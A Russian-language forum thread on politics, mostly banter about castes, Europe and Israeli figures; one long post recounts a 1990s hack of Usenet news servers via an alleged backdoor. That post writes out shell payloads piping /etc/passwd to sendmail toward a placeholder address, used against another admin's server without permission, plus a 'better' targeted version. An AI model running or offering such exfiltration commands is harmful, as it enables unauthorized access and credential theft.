1. В настоящее время регистрация новых пользователей прекращена. В случае, если у Вас есть какие-либо вопросы о регистрации, или вы хотите зарегистрироваться, о вашем аккаунте или любые другие, то посылайте их по почте dmvasf@gmail.com.

УКРАИНА-22

Тема в разделе 'Политика, экономика, общество', создана пользователем Master, 10.06.2017.

Статус темы:
Закрыта.
  1. Оффлайн

    Ellen L. Ripley Агрессор в меховой рукавице

    На форуме с:
    07.04.2013
    Сообщения:
    28.095
    Симпатии:
    73.718
    Баллы:
    41
    Да что вы. Мы вовсе не хотим нигде числиться. Мы просто являемся сами по себе вполне цивилизованной страной. Без всяких клубов по интересам. По факту.

    Да, немного. Нам просто кажется, что эти ожидания, или даже скорее нарочитое подчеркивание, что есть какие-то ожидания, как-то несколько навязчивы и чрезмерны. Ну это как я, взрослый самодостаточный человек, стала бы вдруг ни с того ни сего говорить вам, другому взрослому самодостаточному человеку, чего я от вас ожидаю. Не все ли вам равно на это? Не говоря уже о том, что просто неприлично.

    Это все как-то неконкретно, безлично. Кто ожидает, кто говорит? Мировой жандарм, что ли, наш? Не, у него, конечно, красивая бляха вот это вот самая, да и вооружен он неплохо, чего уж там. Но мы ведь и на рожон тоже совсем не лезем. Но про себя (пока про себя) считаем, что он несколько дискредитировал уже себя, особенно в последнее время - чтобы чего-то от кого-то ожидать.
  2. Оффлайн

    Чукча Абитуриент

    На форуме с:
    08.04.2013
    Сообщения:
    98.803
    Симпатии:
    30.261
    Баллы:
    41
    В Индии до сих пор касты процветают.
  3. Оффлайн

    Ellen L. Ripley Агрессор в меховой рукавице

    На форуме с:
    07.04.2013
    Сообщения:
    28.095
    Симпатии:
    73.718
    Баллы:
    41
    Зато она привела ее в "Гавана-Клуб" :ab:.
    КобзарЪ нравится это.
  4. Оффлайн

    Ellen L. Ripley Агрессор в меховой рукавице

    На форуме с:
    07.04.2013
    Сообщения:
    28.095
    Симпатии:
    73.718
    Баллы:
    41
    И партия касты неприкасаемых победила на последних выборах.
    Карлос Дасоза и КобзарЪ нравится это.
  5. Оффлайн

    Темная лошадка Абитуриент

    На форуме с:
    05.03.2017
    Сообщения:
    20.628
    Симпатии:
    8.787
    Баллы:
    41
    Род занятий:
    советник по науке
    Адрес:
    Россия, Петербург
    Не дёргайтесь, это у него пункт. Прав нет ни у кого. Все народы когда-то откуда-то пришли. Про арабов тоже до VII века никто ничего не слышал. А про США лучше и не вспоминать.
    Карлос Дасоза и КобзарЪ нравится это.
  6. Оффлайн

    Ellen L. Ripley Агрессор в меховой рукавице

    На форуме с:
    07.04.2013
    Сообщения:
    28.095
    Симпатии:
    73.718
    Баллы:
    41
    Челленджер, да вы, я смотрю, и впрямь Упанишады не напрасно штудировали. Так вот чтобы на расстоянии, да физическое отвращение ... Как вам это удается?
  7. Оффлайн

    Чукча Абитуриент

    На форуме с:
    08.04.2013
    Сообщения:
    98.803
    Симпатии:
    30.261
    Баллы:
    41
    Сейчас начнется перебор всех стран ЕС
  8. Оффлайн

    Ladybird Абитуриент

    На форуме с:
    02.03.2017
    Сообщения:
    5.855
    Симпатии:
    3.791
    Баллы:
    41
    «...Чем кумушек считать трудиться, не лучше ль на себя, кума, оборотиться?...»
  9. Оффлайн

    Неизвестный домохозяйка

    На форуме с:
    04.04.2013
    Сообщения:
    51.693
    Симпатии:
    39.059
    Баллы:
    41
    На этот вопрос вижу 3 возможных ответа, а какой верный - не знаю:
    1. Властям есть что скрывать.
    2. Идет гражданская война, не до разборок
    3. Власти посмотрели, увидели, что реальных, доказанных свидетельств - так мало, что овчинка выделки не стоит.
    Ladybird нравится это.
  10. Оффлайн

    Неизвестный домохозяйка

    На форуме с:
    04.04.2013
    Сообщения:
    51.693
    Симпатии:
    39.059
    Баллы:
    41
    Там с кастами сложно:
    в Бенаресе территория, где сжигаются трупы, принадлежит человеку из касты неприкасаемых. Очень богатый человек.
    Ladybird нравится это.
  11. Оффлайн

    Темная лошадка Абитуриент

    На форуме с:
    05.03.2017
    Сообщения:
    20.628
    Симпатии:
    8.787
    Баллы:
    41
    Род занятий:
    советник по науке
    Адрес:
    Россия, Петербург
    В Т-64 на место водителя я как-то раз попытался влезть. Но голова осталась торчать.
  12. Оффлайн

    Неизвестный домохозяйка

    На форуме с:
    04.04.2013
    Сообщения:
    51.693
    Симпатии:
    39.059
    Баллы:
    41
    Эти европейцы. Почему-то недовольны историей с виолончелистом не-помню-как-зовут. Говорят, что мало не сморкаться на людях в скатерть, надо еще и не воровать. Хотя бы в таких масштабах.
    Ласкера нравится это.
  13. Оффлайн

    Ellen L. Ripley Агрессор в меховой рукавице

    На форуме с:
    07.04.2013
    Сообщения:
    28.095
    Симпатии:
    73.718
    Баллы:
    41
    Ну, о вкусах, как известно, не спорят. Но, я не к тому, что именно эти двое мне интересны. Просто я подумала, что вам могут быть знакомы имена, и не ошиблась. У него много всякого народа там ошивается.


    Ну что - честный человек, по крайней мере. Делится проблемой. Да даже по телевизору видно, что невзирая на ермолку, пардон - кипу, глаз фанерой не забит :ab:, как говорится. Но жена же - это о другом. Так что, все очень логично.

    Сатрап. Но не могу сказать, особенно, после пребывания на данном форуме, что я его совсем не понимаю.

    Да они оба были антисоветчики, чего уж там. Но русофобами при этом как-то не стали, что некоторым кажется почему-то естественным.

    То есть, если они не льют денно и нощно на современную Россию и ее власти - то это только за деньги? Другого не дано?

    Мне кажется, что это совсем другая обойма. Шамир - классический левак-экстремист. Степашкин пациент. Кедми с Эскиным - скорее правый центр. Еще даже чуть правее :ab:. И отношение к палестинскому вопросу (что для вашей страны показательно) - диаметрально противоположное.
    Карлос Дасоза и КобзарЪ нравится это.
  14. Оффлайн

    Ladybird Абитуриент

    На форуме с:
    02.03.2017
    Сообщения:
    5.855
    Симпатии:
    3.791
    Баллы:
    41
    Он уже несколько раз перебирал. Меня это забавляет. Чесслово.))) Г-н офицер не умеет принимать отказы.
    Карлос Дасоза и КобзарЪ нравится это.
  15. Оффлайн

    Неизвестный домохозяйка

    На форуме с:
    04.04.2013
    Сообщения:
    51.693
    Симпатии:
    39.059
    Баллы:
    41
    И вообще. Что это за официальное лицо, если позволяет себя в такой позе фотографировать?
    Вот, помню, у нас был случай:
    Министр поехал посмотреть, как земля проваливается возле Мертвого Моря.
    Несмотря на крики - сам побежал посмотреть поближе, и вокруг него стала земля сыпаться.
    Ему закричали:"Ложись на пузо и ползи назад, не вздумай идти, провалишься, идиот!"
    А он ответил:"Сперва уберите фотографов. Не хочу, чтобы фотки меня на пузе - появились в печати!"
    И только когда фотографов прогнали, лег и пополз.
    Ariel нравится это.
  16. Оффлайн

    Неизвестный домохозяйка

    На форуме с:
    04.04.2013
    Сообщения:
    51.693
    Симпатии:
    39.059
    Баллы:
    41
    И на кладбище в полночь проклятья накладывал. Это уж совсем безвкусица.
  17. Оффлайн

    Чукча Абитуриент

    На форуме с:
    08.04.2013
    Сообщения:
    98.803
    Симпатии:
    30.261
    Баллы:
    41
    Реальным признается только первое.
    Неизвестный нравится это.
  18. Оффлайн

    Капитанский сыночек Абитуриент

    На форуме с:
    25.03.2017
    Сообщения:
    48.362
    Симпатии:
    20.557
    Баллы:
    41
    Только цивилизация у нас немного другая. Их немало таких, "других". Даже внутри одной возникают конфликты. А уж между разными ....
  19. Оффлайн

    Неизвестный домохозяйка

    На форуме с:
    04.04.2013
    Сообщения:
    51.693
    Симпатии:
    39.059
    Баллы:
    41
    Сторгуемся на первых двух?
  20. Оффлайн

    big-bang Маршал

    На форуме с:
    07.04.2013
    Сообщения:
    116.399
    Симпатии:
    51.576
    Баллы:
    41
    1) Юниксов, как вы знаете наверное, было 2 разновидности.

    BSD - в этой разновидности пароли пользователей (в зашифрованном виде) находились в файле /etc/passwd который был доступен для чтения многим категориям "пользователей"

    И SVR4 - в этой версии пароли в зашифрованном виде находились в файле /etc/shadow который для чтения доступен только для root:

    $ ls -l /etc/shadow
    -r-------- 1 root sys 437 нояб. 30 2016 /etc/shadow
    $

    В 90-е превалировали системы типа BSD.

    2) Сайтов не было, поэтому общение и диспуты проводились на News серверах, которые представляли собою распределённую систему, они хранили, реплицировали тематические News группы и передавали друг-другу новые сообщения.

    https://en.wikipedia.org/wiki/Category:Usenet

    Когда владелец компьютера ставил себе программу News сервера, он должен был договориться с владельцем уже функционирующего News сервера, чтобы тот позволил ему реплицировать сообщения и группы и принимать от новичка сообщения, чтобы передавать их далее.

    Такая сеть.

    3) Сообщения - это были как бы письма. Заголовок и тело. В заголовке - отправитель, в какую группу, тема и некая дополнительная информация. А в теле - сообщение.

    4) И я где-то вычитал, что в каких-то версиях News сервера разработчики сделали backdoor: если в заголовок включить группу строк начинающуюся и заканчивающуюся секретным заклинанием, то текст между ними будет выполнен как программа на Bourne-shell с привилегиями программы News сервера. Ну а отработав через несколько секунд это письмо самоуничтожается.

    Они это сделали, чтобы облегчить администраторам news серверов удалённое администрирование.

    5) А я дома был и думаю - дай попробую. У нас в офисе один инженер как раз с этой программой разбирался и на наш корпоративный сервер её поставил, но с другими News серверами она связана не была.

    Звоню я модемом на офисный сервер и примерно такое письмо (заклинания секретные уже не помню) передаю:.

    +++
    #/bin/sh
    cat /etc/passwd | /usr/lib/sendmail user@domain.com
    ---

    Т.е. "отошли файл паролей на мой почтовый адрес user@domain.com" (почта у нас хранилась у нашего провайдера - Комбеллги, а мы туда лазили по pop3 за своими письмами, ну как например сейчас на mail.ru)

    Отсылаю я и вижу, что пароли пришли! А тогда уже была программа известна расшифровки паролей и она у меня была.

    6) О! Класс. А у меня был корреспондент по диспутам - он был системным администратором в Центральном телеграфе и мы с ним постоянно конфронтировали.

    И я вспомнил, что он вчера хвалился, что он поставил News сервер, да ещё не требующий регистрации - типа "заходите-тестируйте какой я крутой!"

    Ну я захожу к нему и посылаю сообщение с вышеприведённым текстом.

    И вуаля! Файл паролей приходит мне письмом.

    Я хальтанул компьютер и поехал на работу.

    7) Приезжаю - а мне говорят "Звонил .... (системный администратор) из Комбеллги - просил приехать - что-то у них там случилось".

    Приезжаю. Встречает меня администратор - мой приятель и говорит: "Сижу читаю. Спиной к коммуникационной стойке и вдруг как вся комната осветилась! Как заполыхала! Поворачиваюсь - все лампочки на стойке загорелись".

    А стойка во всю стену.

    "Начал разбираться - по-видимому какой-то хакер заставил сервера со всего мира слать письма на ваш адрес я их тут удаляю-удаляю...."

    Я - не сознался что это я.

    А произошло следующее. Письмо с командой что я отослал на сервер телеграфа через репликацию сообщений разошлось по всему миру - по всем компьютерам Usenet, и те компьютеры из них что имели BSD-unix прислали файлы своих паролей.

    В общем целый день мы боролись удаляя миллионы писем из почтового пула Комбеллги.

    Забавно что и недели спустя иногда единичные письма с паролями приходили - видать эти компьютеры выключены были (например от сети отключены и сразу не могли письмо отослать).

    А как надо было?

    Вот такое письмо надо было отослать:

    +++
    #/bin/sh
    if [ "`uname -n`" == "ctelegraf" ]; then cat /etc/passwd | /usr/lib/sendmail user@domain.com; fi
    ---

    тогда бы письма прислали только компьютеры с именем "ctelegraf" (имя это всегда известно) их не миллионы.

    Просто я не понял, что письма с командами тоже реплицируются. Я думал, что они сразу погибают.
    test, Ladybird и Неизвестный нравится это.
Статус темы:
Закрыта.

Поделиться этой страницей

Пользователи просматривающие тему (Пользователей: 0, Гостей: 87)